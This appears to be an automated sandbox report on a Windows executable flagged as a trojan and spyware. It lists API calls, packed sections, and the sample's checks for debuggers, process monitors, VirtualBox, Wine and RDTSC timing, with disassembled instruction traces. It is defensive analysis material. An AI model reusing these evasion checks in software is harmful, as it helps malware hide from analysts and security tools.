Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C03A700_2_00C03A70
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008C1BE00_2_008C1BE0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BF1BD00_2_00BF1BD0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BD1B500_2_00BD1B50
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00B39C800_2_00B39C80
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BE7CC00_2_00BE7CC0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00895DB00_2_00895DB0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008A5EB00_2_008A5EB0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00893ED00_2_00893ED0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C09FE00_2_00C09FE0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0089CD40 appears 80 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008875A0 appears 696 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 00A5CBC0 appears 104 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 00A37220 appears 96 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0089CCD0 appears 54 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 009644A0 appears 76 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C5340 appears 50 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C4F40 appears 335 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008873F0 appears 111 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C4FD0 appears 288 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0088C960 appears 37 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008871E0 appears 47 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 0088CAA0 appears 64 times
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: String function: 008C50A0 appears 101 times
Source: f9bcOz8SxR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: f9bcOz8SxR.exeStatic PE information: Section: dakbihel ZLIB complexity 0.9944495147459816
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008829FF
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: f9bcOz8SxR.exeVirustotal: Detection: 50%
Source: f9bcOz8SxR.exeReversingLabs: Detection: 68%
Source: f9bcOz8SxR.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f9bcOz8SxR.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeSection loaded: kernel.appcore.dllJump to behavior
Source: f9bcOz8SxR.exeStatic file information: File size 4436480 > 1048576
Source: f9bcOz8SxR.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: f9bcOz8SxR.exeStatic PE information: Raw size of dakbihel is bigger than: 0x100000 < 0x1b3800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeUnpacked PE file: 0.2.f9bcOz8SxR.exe.880000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dakbihel:EW;elpejykg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dakbihel:EW;elpejykg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: f9bcOz8SxR.exeStatic PE information: real checksum: 0x445e61 should be: 0x4470f6
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: .idata
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: dakbihel
Source: f9bcOz8SxR.exeStatic PE information: section name: elpejykg
Source: f9bcOz8SxR.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_3_016438F1 push ebx; retn 0052h0_3_016438F2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_3_016438F1 push ebx; retn 0052h0_3_016438F2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_3_016438F1 push ebx; retn 0052h0_3_016438F2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_3_016438F1 push ebx; retn 0052h0_3_016438F2
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C041D0 push eax; mov dword ptr [esp], edx0_2_00C041D5
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00902340 push eax; mov dword ptr [esp], 00000000h0_2_00902343
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0093C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0093C743
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008C0AC0 push eax; mov dword ptr [esp], 00000000h0_2_008C0AC4
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008E1430 push eax; mov dword ptr [esp], 00000000h0_2_008E1433
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_009039A0 push eax; mov dword ptr [esp], 00000000h0_2_009039A3
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008DDAD0 push eax; mov dword ptr [esp], edx0_2_008DDAD1
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C09F40 push dword ptr [eax+04h]; ret 0_2_00C09F6F
Source: f9bcOz8SxR.exeStatic PE information: section name: dakbihel entropy: 7.9549442757670565

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012924 second address: 101292E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012BCB second address: 1012BE4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6184834896h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F6184834896h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012BE4 second address: 1012C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6184CCBA7Ah 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6184CCBA7Bh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012C09 second address: 1012C13 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F61848348A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012EB1 second address: 1012ECA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 je 00007F6184CCBA76h 0x0000000f jc 00007F6184CCBA76h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012ECA second address: 1012ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012ED5 second address: 1012EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jg 00007F6184CCBA78h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1012EEA second address: 1012F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016DED second address: 1016DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016DF1 second address: 1016E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F6184834896h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F618483489Bh 0x00000019 popad 0x0000001a pop ecx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F6184834898h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov edx, 116A7E7Ah 0x0000003b sub edi, 5FAD4E82h 0x00000041 push 00000000h 0x00000043 jmp 00007F61848348A6h 0x00000048 push 15E0A5FFh 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016E60 second address: 1016E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016E73 second address: 1016E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016E79 second address: 1016EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 15E0A57Fh 0x0000000f cld 0x00000010 push 00000003h 0x00000012 sub cx, 6405h 0x00000017 clc 0x00000018 push 00000000h 0x0000001a movzx esi, ax 0x0000001d push 00000003h 0x0000001f push eax 0x00000020 mov dword ptr [ebp+122D2215h], ebx 0x00000026 pop ecx 0x00000027 push E3E9380Ch 0x0000002c jmp 00007F6184CCBA7Ah 0x00000031 xor dword ptr [esp], 23E9380Ch 0x00000038 pushad 0x00000039 mov dword ptr [ebp+122D2106h], edi 0x0000003f mov ecx, 745A22FAh 0x00000044 popad 0x00000045 lea ebx, dword ptr [ebp+1244CBC0h] 0x0000004b mov edx, 05CBEFC1h 0x00000050 jmp 00007F6184CCBA85h 0x00000055 push eax 0x00000056 push ebx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1016F63 second address: 1016FA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F618483489Ah 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F61848348A7h 0x00000012 pushad 0x00000013 jmp 00007F61848348A4h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10277BB second address: 10277C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6184CCBA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10277C5 second address: 10277CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100AE1A second address: 100AE24 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6184CCBA7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100AE24 second address: 100AE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F61848348A2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100AE30 second address: 100AE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1034707 second address: 103470E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1034856 second address: 103485A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1034B12 second address: 1034B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 103564B second address: 1035651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102BAF8 second address: 102BAFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102BAFE second address: 102BB19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6184CCBA7Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102BB19 second address: 102BB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102BB1F second address: 102BB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA80h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102BB33 second address: 102BB3D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6184834896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1005E89 second address: 1005EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jp 00007F6184CCBA76h 0x0000000c pop ecx 0x0000000d jmp 00007F6184CCBA80h 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1005EAC second address: 1005EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1005EB0 second address: 1005EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6184CCBA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1035810 second address: 1035816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1035DCB second address: 1035DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F6184CCBA76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10360B4 second address: 10360F3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F61848348C3h 0x00000008 jmp 00007F61848348A8h 0x0000000d jmp 00007F61848348A5h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F6184834896h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10360F3 second address: 10360F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1039081 second address: 1039086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1039086 second address: 103908C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 103908C second address: 10390AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F61848348A5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10398EB second address: 10398F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: FFF4DD second address: FFF4E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: FFF4E3 second address: FFF4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA85h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: FFF4FC second address: FFF51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F61848348A9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1041900 second address: 104194C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6184CCBA76h 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007F6184CCBA76h 0x00000012 jmp 00007F6184CCBA80h 0x00000017 jmp 00007F6184CCBA87h 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push edx 0x00000023 pop edx 0x00000024 jnp 00007F6184CCBA76h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104194C second address: 1041950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1040CDE second address: 1040CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1040FE6 second address: 1040FEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
